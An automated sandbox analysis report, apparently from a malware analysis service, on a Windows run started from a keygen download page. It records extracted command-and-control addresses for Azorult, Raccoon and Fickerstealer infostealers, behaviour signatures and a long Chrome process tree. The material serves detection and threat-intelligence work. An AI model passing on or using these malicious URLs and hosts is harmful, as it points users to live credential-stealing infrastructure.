Analysis

  • max time kernel
    398s
  • max time network
    486s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 17:01

Errors

Reason
Machine shutdown

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 41 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 22 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/0f26cf244e1108834498.html
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc6e704f50,0x7ffc6e704f60,0x7ffc6e704f70
      2⤵
        PID:2368
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1580 /prefetch:2
        2⤵
          PID:2972
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1628 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:192
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:8
          2⤵
            PID:2316
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
            2⤵
              PID:2052
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
              2⤵
                PID:2116
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                2⤵
                  PID:3816
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
                  2⤵
                    PID:1212
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1
                    2⤵
                      PID:1812
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
                      2⤵
                        PID:4132
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:8
                        2⤵
                          PID:4536
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
                          2⤵
                            PID:4640
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                            2⤵
                              PID:4696
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
                              2⤵
                                PID:4748
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5500 /prefetch:8
                                2⤵
                                  PID:4784
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:8
                                  2⤵
                                    PID:4820
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5364 /prefetch:8
                                    2⤵
                                      PID:4856
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4896
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6412 /prefetch:8
                                      2⤵
                                        PID:4944
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:8
                                        2⤵
                                          PID:5020
                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                          2⤵
                                            PID:5096
                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff61dd2a890,0x7ff61dd2a8a0,0x7ff61dd2a8b0
                                              3⤵
                                                PID:5116
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5504 /prefetch:8
                                              2⤵
                                                PID:4220
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
                                                2⤵
                                                  PID:4388
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
                                                  2⤵
                                                    PID:912
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6812 /prefetch:8
                                                    2⤵
                                                      PID:4452
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6828 /prefetch:8
                                                      2⤵
                                                        PID:4580
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2272
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6000 /prefetch:8
                                                        2⤵
                                                          PID:4692
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:8
                                                          2⤵
                                                            PID:4736
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7040 /prefetch:8
                                                            2⤵
                                                              PID:4788
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:8
                                                              2⤵
                                                                PID:4816
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5432 /prefetch:8
                                                                2⤵
                                                                  PID:4804
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
                                                                  2⤵
                                                                    PID:5040
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
                                                                    2⤵
                                                                      PID:4820
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
                                                                      2⤵
                                                                        PID:5056
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:8
                                                                        2⤵
                                                                          PID:4856
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
                                                                          2⤵
                                                                            PID:4336
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6536 /prefetch:8
                                                                            2⤵
                                                                              PID:644
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7296 /prefetch:8
                                                                              2⤵
                                                                                PID:4408
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6140 /prefetch:8
                                                                                2⤵
                                                                                  PID:2112
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7440 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4724
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7460 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4508
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7820 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4568
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7452 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4708
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7968 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4728
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8228 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4920
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8120 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4836
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4224
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5028
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4708
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:4140
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4832
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4132 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:2312
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3748 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4560
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4944
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6808 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:3968
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4540
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3504 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5060
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,15374139199167132133,9067282105840836902,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4920
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                              1⤵
                                                                                                                PID:2820
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                1⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2800
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                1⤵
                                                                                                                  PID:2748
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                  1⤵
                                                                                                                    PID:2572
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                    1⤵
                                                                                                                      PID:2536
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                      1⤵
                                                                                                                        PID:1900
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                        1⤵
                                                                                                                          PID:1448
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                          1⤵
                                                                                                                            PID:1292
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                            1⤵
                                                                                                                              PID:1216
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                              1⤵
                                                                                                                                PID:1088
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:296
